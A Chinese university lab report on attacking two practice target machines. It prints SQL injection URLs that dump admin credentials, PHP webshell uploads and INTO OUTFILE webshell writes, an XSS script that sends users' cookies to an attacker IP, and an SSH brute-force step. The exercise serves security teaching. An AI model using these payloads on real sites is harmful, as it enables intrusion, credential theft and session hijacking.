web 攻擊靶機

中國人民公安大學

Chinese people’ public security university

 

網絡對抗技術

實驗報告

 

實驗五

web攻擊靶機

 

 

 

學生姓名	王磊
年級	2015
區隊	二
指導教師	高見

 

 

信息技術與網絡安全學院

2018年10月10日

一、sql注入靶機攻擊

首先搭建虛擬機 用kali掃描下當前網段netdiscover -r 192.168.2.0/24

發現可疑ip地址192.168.2.129

並使用nmap掃描這個ip地址，發現其開放了ftp和http協議

打開該虛擬機提供的網頁，發現該網站使用url傳參，可能存在sql注入點

在id=1后加一個引號，網頁報錯 該網站存在sql注入漏洞

 

 

使用order by語句試出網站后台數據庫表的列數 當order by 5 時網頁報錯 因此該查詢涉及到四列元素

使用聯合查詢 查看網頁的顯示位，得到顯示位就可以顯示數據庫的名字 photoblog

http://192.168.2.129/cat.php?id=-2%20union%20select%201,database%20(),3,4

 

得到數據庫名字 可以查詢數據庫中有那些表http://192.168.2.129/cat.php?id=-2%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27

 一般情況下users表對我們有用

http://192.168.2.129/cat.php?id=-2%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27

繼續查詢users表中列名，有變量名 id，login，password

查看users表中的數據：id=1 login=admin password=8efe310f9ab3efeae8d410a8e0166eb2

http://192.168.2.129/cat.php?id=-1%20union%20select%201,group_concat(id,0x23,login,0x23,password),3,4%20from%20users

 

 MD5解密后，得到密碼P4ssw0rd

登錄到管理員頁面

嘗試上傳文件，<?php eval($_POST['a'])?>

發現nophp

改完后綴名發現，可以繞過，並上傳成功

http://192.168.2.129/admin/uploads/123456.pHp

 得到目錄，菜刀連接

2.xss靶機攻擊

nmap 掃描192.168.2.130發現靶機開着80端口和ssh協議

測試

 

 

有窗口彈出，證明存在漏洞

在靶機上留言<script>document.write('<img src="http://172.22.152.33/?'+document.cookie+' "/>')</script>

可以將任意登錄用戶的cookie發送到指定ip 在指定 ip 接受 cookie 后可以偽造成登陸者

 

登錄界面：使用密碼和用戶名進行登錄

獲取到的cookie

使用cookie再次進行登錄：發現已經已admin的身份登錄進頁面中。

進入管理界面后，發現博客編輯界面存在sql注入漏洞

 

 

http://192.168.2.130/admin/edit.php?id=4 union select 1,2,3,4

發現2和3可以顯示出來。

 

 

 

 http://192.168.2.130/admin/edit.php?id=0 union select 1,2,load_file("/etc/passwd"),4

可以讀取passwd文件，但是不能讀取shadow文件。

我們嘗試能不能創建一個文件。

在編輯頁面發現錯誤提示中有/var/www/classes 目錄，

 

 

嘗試后發現/var/www/css 目錄可寫。

於是構造語句：

http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

然后打開

http://192.168.2.130/css/s.php

 

說明s.php文件成功寫入到/var/www/css 目錄，下面將

<?php system($_GET['c']); ?>

寫入z.php中，構造url為：

http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

訪問z.php，並使用uname -a獲取系統信息。可以遠程執行命令。

下面寫入一句話木馬，構造url：

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

菜刀鏈接：

下面寫入一句話木馬，構造url：

http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

菜刀鏈接：

發現機器開了ssh，因此用hydra爆破下：

 ssh登陸